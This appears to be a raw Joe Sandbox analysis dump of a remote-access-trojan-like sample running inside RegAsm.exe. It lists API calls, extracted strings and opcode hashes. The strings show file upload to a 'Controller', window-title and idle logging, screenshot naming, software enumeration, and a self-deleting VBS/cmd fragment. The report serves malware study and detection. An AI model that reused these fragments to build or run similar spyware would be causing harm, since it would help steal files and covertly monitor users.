                                  • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E37
                                  • FreeLibrary.KERNEL32(00000000), ref: 00414E3E
                                  • LoadLibraryA.KERNEL32(?), ref: 00414E76
                                  • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E88
                                  • FreeLibrary.KERNEL32(00000000), ref: 00414E8F
                                  • GetProcAddress.KERNEL32(00000000,?), ref: 00414E9E
                                  • FreeLibrary.KERNEL32(00000000), ref: 00414EB5
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Library$AddressFreeProc$Load$DirectorySystem
                                  • String ID: \ws2_32$\wship6$freeaddrinfo$getaddrinfo$getnameinfo
                                  • API String ID: 2490988753-744132762
                                  • Opcode ID: 5f1d90fefb9d3b4d80abd47ac0ceceaf8be97214d3ee7f7b1d429d579a686c66
                                  • Instruction ID: d7a8240acd80c680e6a706eb94e62412fcb65bdb905c2e3468e0ccb64a1f64dc
                                  • Opcode Fuzzy Hash: 5f1d90fefb9d3b4d80abd47ac0ceceaf8be97214d3ee7f7b1d429d579a686c66
                                  • Instruction Fuzzy Hash: 8C31D5B1902315A7C320EF65DC84EDBB7D8AF84744F004A2AF94893250D778DD858BEE
                                  APIs
                                  • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 0041C6B1
                                  • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0041C6F5
                                  • RegCloseKey.ADVAPI32(?), ref: 0041C9BF
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseEnumOpen
                                  • String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
                                  • API String ID: 1332880857-3714951968
                                  • Opcode ID: 01bc9fe353fd2bad3d2e5d6b02442aa3bdaad2c57b214901d2918a8b4713c134
                                  • Instruction ID: af0903b0dab8fbea49832074ad132f154b97281cd99b968e1e8b6bf9777b958e
                                  • Opcode Fuzzy Hash: 01bc9fe353fd2bad3d2e5d6b02442aa3bdaad2c57b214901d2918a8b4713c134
                                  • Instruction Fuzzy Hash: 248144711083419BC325EF11D851EEFB7E8BF94309F10492FB589921A1FF78AE49CA5A
                                  APIs
                                  • DefWindowProcA.USER32(?,00000401,?,?), ref: 0041D5DA
                                  • GetCursorPos.USER32(?), ref: 0041D5E9
                                  • SetForegroundWindow.USER32(?), ref: 0041D5F2
                                  • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041D60C
                                  • Shell_NotifyIconA.SHELL32(00000002,00474B48), ref: 0041D65D
                                  • ExitProcess.KERNEL32 ref: 0041D665
                                  • CreatePopupMenu.USER32 ref: 0041D66B
                                  • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041D680
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                                  • String ID: Close
                                  • API String ID: 1657328048-3535843008
                                  • Opcode ID: dc0ab9a0fe4ab677523636461039160516679b910eee6fe46bba41fdb84f3345
                                  • Instruction ID: 483e3be36cf21f9f431d69439bfbb75804d706e25d1e382f075e68ac53faeb55
                                  • Opcode Fuzzy Hash: dc0ab9a0fe4ab677523636461039160516679b910eee6fe46bba41fdb84f3345
                                  • Instruction Fuzzy Hash: 392127B1944208FFDB194FA4ED0EAAA3B65FB08342F000135FA0A950B1D775EDA1EB5D
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: _free$Info
                                  • String ID:
                                  • API String ID: 2509303402-0
                                  • Opcode ID: 8630906f26d86e97c2d01feafad3d8567ddb50c678f2cb36b5e7577a775c1f69
                                  • Instruction ID: 88ee944febda996c7adaaf7605242af7944d99fb061a5fd2e4f26fad8993db39
                                  • Opcode Fuzzy Hash: 8630906f26d86e97c2d01feafad3d8567ddb50c678f2cb36b5e7577a775c1f69
                                  • Instruction Fuzzy Hash: 75B1CD719006059FEF20DF69C881BEEBBB4FF09304F14412EF5A8A7242D6799D45CB65
                                  APIs
                                  • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,000000B6), ref: 00408CE3
                                  • GetFileSizeEx.KERNEL32(00000000,?), ref: 00408D1B
                                  • __aulldiv.LIBCMT ref: 00408D4D
                                    • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                    • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                  • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 00408E70
                                  • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00408E8B
                                  • CloseHandle.KERNEL32(00000000), ref: 00408F64
                                  • CloseHandle.KERNEL32(00000000,00000052), ref: 00408FAE
                                  • CloseHandle.KERNEL32(00000000), ref: 00408FFC
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: File$CloseHandle$CreateLocalPointerReadSizeTime__aulldivsend
                                  • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller: $NG
                                  • API String ID: 3086580692-2582957567
                                  • Opcode ID: 72fad283c4fe1643dee5b4a459ce18e644925f4e3f1a855a4ff9453ab0215ac4
                                  • Instruction ID: 4fd1ef8f0950b8c70c5ee12d710945c0a569e6ad21e20d2a74dcf75f3ec9a52d
                                  • Opcode Fuzzy Hash: 72fad283c4fe1643dee5b4a459ce18e644925f4e3f1a855a4ff9453ab0215ac4
                                  • Instruction Fuzzy Hash: 95B193716083409BC314FB25C982AAFB7E5AFC4354F50492FF589622D2EF789945CB8B
                                  APIs
                                  • Sleep.KERNEL32(00001388), ref: 0040A740
                                    • Part of subcall function 0040A675: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0040A74D), ref: 0040A6AB
                                    • Part of subcall function 0040A675: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A74D), ref: 0040A6BA
                                    • Part of subcall function 0040A675: Sleep.KERNEL32(00002710,?,?,?,0040A74D), ref: 0040A6E7
                                    • Part of subcall function 0040A675: CloseHandle.KERNEL32(00000000,?,?,?,0040A74D), ref: 0040A6EE
                                  • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0040A77C
                                  • GetFileAttributesW.KERNEL32(00000000), ref: 0040A78D
                                  • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 0040A7A4
                                  • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00000012), ref: 0040A81E
                                    • Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040A843), ref: 0041C49E
                                  • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00466468,?,00000000,00000000,00000000,00000000,00000000), ref: 0040A927
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                                  • String ID: 8SG$8SG$pQG$pQG$PG$PG
                                  • API String ID: 3795512280-1152054767
                                  • Opcode ID: 677456a4732d5fb77e9c8745959e99ef54ead223a942f07a0b0fb3c37e482db7
                                  • Instruction ID: 265ddfea45d140738b9a7e0f0353a6f5be26653907181caffe3561bb72ed66c0
                                  • Opcode Fuzzy Hash: 677456a4732d5fb77e9c8745959e99ef54ead223a942f07a0b0fb3c37e482db7
                                  • Instruction Fuzzy Hash: A7517E716043055ACB09BB32C866ABE739A9F80349F00483FB642B71E2DF7C9D09865E
                                  APIs
                                  • ___free_lconv_mon.LIBCMT ref: 0045130A
                                    • Part of subcall function 00450502: _free.LIBCMT ref: 0045051F
                                    • Part of subcall function 00450502: _free.LIBCMT ref: 00450531
                                    • Part of subcall function 00450502: _free.LIBCMT ref: 00450543
                                    • Part of subcall function 00450502: _free.LIBCMT ref: 00450555
                                    • Part of subcall function 00450502: _free.LIBCMT ref: 00450567
                                    • Part of subcall function 00450502: _free.LIBCMT ref: 00450579
                                    • Part of subcall function 00450502: _free.LIBCMT ref: 0045058B
                                    • Part of subcall function 00450502: _free.LIBCMT ref: 0045059D
                                    • Part of subcall function 00450502: _free.LIBCMT ref: 004505AF
                                    • Part of subcall function 00450502: _free.LIBCMT ref: 004505C1
                                    • Part of subcall function 00450502: _free.LIBCMT ref: 004505D3
                                    • Part of subcall function 00450502: _free.LIBCMT ref: 004505E5
                                    • Part of subcall function 00450502: _free.LIBCMT ref: 004505F7
                                  • _free.LIBCMT ref: 004512FF
                                    • Part of subcall function 00446782: RtlFreeHeap.NTDLL(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
                                    • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                  • _free.LIBCMT ref: 00451321
                                  • _free.LIBCMT ref: 00451336
                                  • _free.LIBCMT ref: 00451341
                                  • _free.LIBCMT ref: 00451363
                                  • _free.LIBCMT ref: 00451376
                                  • _free.LIBCMT ref: 00451384
                                  • _free.LIBCMT ref: 0045138F
                                  • _free.LIBCMT ref: 004513C7
                                  • _free.LIBCMT ref: 004513CE
                                  • _free.LIBCMT ref: 004513EB
                                  • _free.LIBCMT ref: 00451403
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                  • String ID:
                                  • API String ID: 161543041-0
                                  • Opcode ID: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
                                  • Instruction ID: 673b37a441ff9bbb7eb6cd98574e5fa8379d72fae64c09c4febd1ea684bb8cd8
                                  • Opcode Fuzzy Hash: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
                                  • Instruction Fuzzy Hash: 0E319E315007009FFB20AA7AD845B5B73E8EF0131AF50851FEC68D7662DF78AD448B59
                                  APIs
                                  • __EH_prolog.LIBCMT ref: 00419FB9
                                  • GdiplusStartup.GDIPLUS(00474ACC,?,00000000), ref: 00419FEB
                                  • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 0041A077
                                  • Sleep.KERNEL32(000003E8), ref: 0041A0FD
                                  • GetLocalTime.KERNEL32(?), ref: 0041A105
                                  • Sleep.KERNEL32(00000000,00000018,00000000), ref: 0041A1F4
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
                                  • String ID: time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i$PG$PG$PG
                                  • API String ID: 489098229-1431523004
                                  • Opcode ID: c46b288c88e8fad2cac684537be2f5c8f54ab494b41e10cc9a988c1d5ba90d08
                                  • Instruction ID: 65e100c03f0dda0ba9a952c873ad8774fe275ee1deca45487f64c7c8a8292b0e
                                  • Opcode Fuzzy Hash: c46b288c88e8fad2cac684537be2f5c8f54ab494b41e10cc9a988c1d5ba90d08
                                  • Instruction Fuzzy Hash: E7515D70A00215AACB14BBB5C8529ED7BA9AB44308F40403FF509AB1E2EF7C9D85C799
                                  APIs
                                    • Part of subcall function 00412850: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F8C8), ref: 00412860
                                    • Part of subcall function 00412850: WaitForSingleObject.KERNEL32(000000FF), ref: 00412873
                                    • Part of subcall function 004136F8: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,004752F0), ref: 00413714
                                    • Part of subcall function 004136F8: RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 0041372D
                                    • Part of subcall function 004136F8: RegCloseKey.KERNEL32(00000000), ref: 00413738
                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040D859
                                  • ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000000), ref: 0040D9B8
                                  • ExitProcess.KERNEL32 ref: 0040D9C4
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                                  • String ID: """, 0$.vbs$8SG$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
                                  • API String ID: 1913171305-3159800282
                                  • Opcode ID: 636c7451f86ad7dcbf51a7e77965c9df5bd33ebd3fbbde82d92fca028294b8c2
                                  • Instruction ID: 6fc8d312854778a25908ca85050b1cee1951ef16e4956e50e312a563d71e527c
                                  • Opcode Fuzzy Hash: 636c7451f86ad7dcbf51a7e77965c9df5bd33ebd3fbbde82d92fca028294b8c2
                                  • Instruction Fuzzy Hash: 0C413A719001195ACB15FA62DC56DEEB778AF50309F10007FB10AB61E2EF785E4ACA98
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: _free
                                  • String ID:
                                  • API String ID: 269201875-0
                                  • Opcode ID: f13b302446b66475bb18d5d42f55ab1b7190c32ccf1072046f607fb9a40aa2ef
                                  • Instruction ID: d910990a8472ee08c0279d8077499983e41ff25138a9859a729e4309013b5263
                                  • Opcode Fuzzy Hash: f13b302446b66475bb18d5d42f55ab1b7190c32ccf1072046f607fb9a40aa2ef
                                  • Instruction Fuzzy Hash: E2C17476D40204AFEB20DBA9CC83FDE77B8AB19705F14015AFE05EB283D6B49D458798
                                  APIs
                                  • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E38
                                  • SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E43
                                  • CloseHandle.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E4C
                                  • closesocket.WS2_32(000000FF), ref: 00404E5A
                                  • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E91
                                  • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00404EA2
                                  • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404EA9
                                  • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404EBA
                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404EBF
                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404EC4
                                  • SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404ED1
                                  • CloseHandle.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404ED6
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseEventHandle$ObjectSingleWait$closesocket
                                  • String ID:
                                  • API String ID: 3658366068-0
                                  • Opcode ID: 0463b1faaa3f7a02a97a49212c31dd980e99cbb732c39645afe60185321c9919
                                  • Instruction ID: 0c11cd9b042c69dc9d4dd2828563f6d61870a883144e53252efabab5b24bcc37
                                  • Opcode Fuzzy Hash: 0463b1faaa3f7a02a97a49212c31dd980e99cbb732c39645afe60185321c9919
                                  • Instruction Fuzzy Hash: BF21E871104B04AFDB216B26DC49B27BBA1FF40326F104A2EE2E211AF1CB75B851DB58
                                  APIs
                                    • Part of subcall function 004558A9: CreateFileW.KERNEL32(00000000,00000000,?,00455C84,?,?,00000000,?,00455C84,00000000,0000000C), ref: 004558C6
                                  • GetLastError.KERNEL32 ref: 00455CEF
                                  • __dosmaperr.LIBCMT ref: 00455CF6
                                  • GetFileType.KERNEL32(00000000), ref: 00455D02
                                  • GetLastError.KERNEL32 ref: 00455D0C
                                  • __dosmaperr.LIBCMT ref: 00455D15
                                  • CloseHandle.KERNEL32(00000000), ref: 00455D35
                                  • CloseHandle.KERNEL32(?), ref: 00455E7F
                                  • GetLastError.KERNEL32 ref: 00455EB1
                                  • __dosmaperr.LIBCMT ref: 00455EB8
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                  • String ID: H
                                  • API String ID: 4237864984-2852464175
                                  • Opcode ID: ad10cc44415123364ccf3ab0f87a2b5b2deaae059395c87e8052164914e7d7f7
                                  • Instruction ID: f4290dc4267d91ba683862cdaabef3013db21248f4240db41616def06e578eae
                                  • Opcode Fuzzy Hash: ad10cc44415123364ccf3ab0f87a2b5b2deaae059395c87e8052164914e7d7f7
                                  • Instruction Fuzzy Hash: D5A155329106049FDF19AF68DC617BE3BA0EB06325F14415EEC11EB392CB398D5ACB59
                                  APIs
                                  • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,0045405C,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 00453E2F
                                  • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,0045405C,00000000,00000000,?,00000001,?,?,?,?), ref: 00453EB2
                                  • __alloca_probe_16.LIBCMT ref: 00453EEA
                                  • MultiByteToWideChar.KERNEL32(00000001,00000001,?,00000001,00000000,\@E,?,0045405C,00000000,00000000,?,00000001,?,?,?,?), ref: 00453F45
                                  • __alloca_probe_16.LIBCMT ref: 00453F94
                                  • MultiByteToWideChar.KERNEL32(00000001,00000009,00000001,00000000,00000000,00000000,?,0045405C,00000000,00000000,?,00000001,?,?,?,?), ref: 00453F5C
                                    • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169
                                  • MultiByteToWideChar.KERNEL32(00000001,00000001,00000001,00000000,00000000,?,?,0045405C,00000000,00000000,?,00000001,?,?,?,?), ref: 00453FD8
                                  • __freea.LIBCMT ref: 00454003
                                  • __freea.LIBCMT ref: 0045400F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
                                  • String ID: \@E
                                  • API String ID: 201697637-1814623452
                                  • Opcode ID: b82298bc980002c4571abe1a7b6d85811e1f97afd47d25fecd247c7af7e2facf
                                  • Instruction ID: bd5a1837779a5f2dcb5c2ea5aeb828518df7829aba760434011a70bbc407b236
                                  • Opcode Fuzzy Hash: b82298bc980002c4571abe1a7b6d85811e1f97afd47d25fecd247c7af7e2facf
                                  • Instruction Fuzzy Hash: E391F472E002069ADB209E65CC42AEFBBF59F09756F14052BFC01E7282D739DD89C768
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: _free
                                  • String ID: \&G$\&G$`&G
                                  • API String ID: 269201875-253610517
                                  • Opcode ID: f843711e33ddf2e4d4c3baca2ca6b2426e0ab7997c39caf6bf5fac4d84d12184
                                  • Instruction ID: 0b3297c67b001fbc5a9f4fbe1fd197d652097ca420ae28a40b4f72db8b3ed5d1
                                  • Opcode Fuzzy Hash: f843711e33ddf2e4d4c3baca2ca6b2426e0ab7997c39caf6bf5fac4d84d12184
                                  • Instruction Fuzzy Hash: 77610475900204AFDB20CFA9C882B9ABBF4EF05315F14416BED58EB342D774AD458B98
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: 65535$udp
                                  • API String ID: 0-1267037602
                                  • Opcode ID: c855b19cc43d9bec36cd86ac5f012ace8f0d54e169e32fa1a21da6d4488bf9b2
                                  • Instruction ID: ff24d6befd6f0703c902a6165bd45161ed4db0fb5f75d2635e7e580b9b2721aa
                                  • Opcode Fuzzy Hash: c855b19cc43d9bec36cd86ac5f012ace8f0d54e169e32fa1a21da6d4488bf9b2
                                  • Instruction Fuzzy Hash: EF51E7756093019FDB209B58E9057BB37A4AFC4755F08082FF881973A1E76DCCC1865E
                                  APIs
                                  • __Init_thread_footer.LIBCMT ref: 0040AD38
                                  • Sleep.KERNEL32(000001F4), ref: 0040AD43
                                  • GetForegroundWindow.USER32 ref: 0040AD49
                                  • GetWindowTextLengthW.USER32(00000000), ref: 0040AD52
                                  • GetWindowTextW.USER32(00000000,00000000,00000000), ref: 0040AD86
                                  • Sleep.KERNEL32(000003E8), ref: 0040AE54
                                    • Part of subcall function 0040A636: SetEvent.KERNEL32(?,?,00000000,0040B20A,00000000), ref: 0040A662
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Window$SleepText$EventForegroundInit_thread_footerLength
                                  • String ID: [${ User has been idle for $ minutes }$]
                                  • API String ID: 911427763-3954389425
                                  • Opcode ID: 1fd890e2d21f894b0b3b077f7e4e96656cdfff5721ec9a02ea1a5f8763c76f61
                                  • Instruction ID: 3d5ee5432c15115af2c0f1375ae13a0ba8112eb59c463c5c733e63bb31497985
                                  • Opcode Fuzzy Hash: 1fd890e2d21f894b0b3b077f7e4e96656cdfff5721ec9a02ea1a5f8763c76f61
                                  • Instruction Fuzzy Hash: 6D51B1316043419BD314FB21D846AAE7796AB84308F50093FF586A22E2EF7C9D45C69F
                                  APIs
                                  • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A892
                                  • GetLastError.KERNEL32(?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A89F
                                  • __dosmaperr.LIBCMT ref: 0043A8A6
                                  • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A8D2
                                  • GetLastError.KERNEL32(?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A8DC
                                  • __dosmaperr.LIBCMT ref: 0043A8E3
                                  • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401D55,?), ref: 0043A926
                                  • GetLastError.KERNEL32(?,?,?,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A930
                                  • __dosmaperr.LIBCMT ref: 0043A937
                                  • _free.LIBCMT ref: 0043A943
                                  • _free.LIBCMT ref: 0043A94A
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                                  • String ID:
                                  • API String ID: 2441525078-0
                                  • Opcode ID: ad6d2cb2e677ca1b0a2e36bb2f761ff70c692d274a08f618d4296a8b89361871
                                  • Instruction ID: 785efe6d9c8e3fffb8b85045f967b8474775cb8629fdf0d32462ae01257f7f2e
                                  • Opcode Fuzzy Hash: ad6d2cb2e677ca1b0a2e36bb2f761ff70c692d274a08f618d4296a8b89361871
                                  • Instruction Fuzzy Hash: FF31F57140420AFFDF01AFA5CC45DAF3B68EF09325F10021AF950662A1DB38CD21DB6A
                                  APIs
                                  • SetEvent.KERNEL32(?,?), ref: 004054BF
                                  • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0040556F
                                  • TranslateMessage.USER32(?), ref: 0040557E
                                  • DispatchMessageA.USER32(?), ref: 00405589
                                  • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00474F78), ref: 00405641
                                  • HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 00405679
                                    • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                                  • String ID: CloseChat$DisplayMessage$GetMessage
                                  • API String ID: 2956720200-749203953
                                  • Opcode ID: 685fd760973951ef657dab710ca0ffd0d5e343078631b5a88e9e506cca6722c1
                                  • Instruction ID: c1940132788662b917c5ec79ff16bb55de46c7435784779dc5fc992d72e4b12f
                                  • Opcode Fuzzy Hash: 685fd760973951ef657dab710ca0ffd0d5e343078631b5a88e9e506cca6722c1
                                  • Instruction Fuzzy Hash: CE41A171604701ABCB14FB75DC5A86F37A9AB85704F40093EF916A36E1EF3C8905CB9A
                                  APIs
                                    • Part of subcall function 00417F2C: __EH_prolog.LIBCMT ref: 00417F31
                                  • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,004660A4), ref: 00417DDC
                                  • CloseHandle.KERNEL32(00000000), ref: 00417DE5
                                  • DeleteFileA.KERNEL32(00000000), ref: 00417DF4
                                  • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 00417DA8
                                    • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseDeleteExecuteFileH_prologHandleObjectShellSingleWaitsend
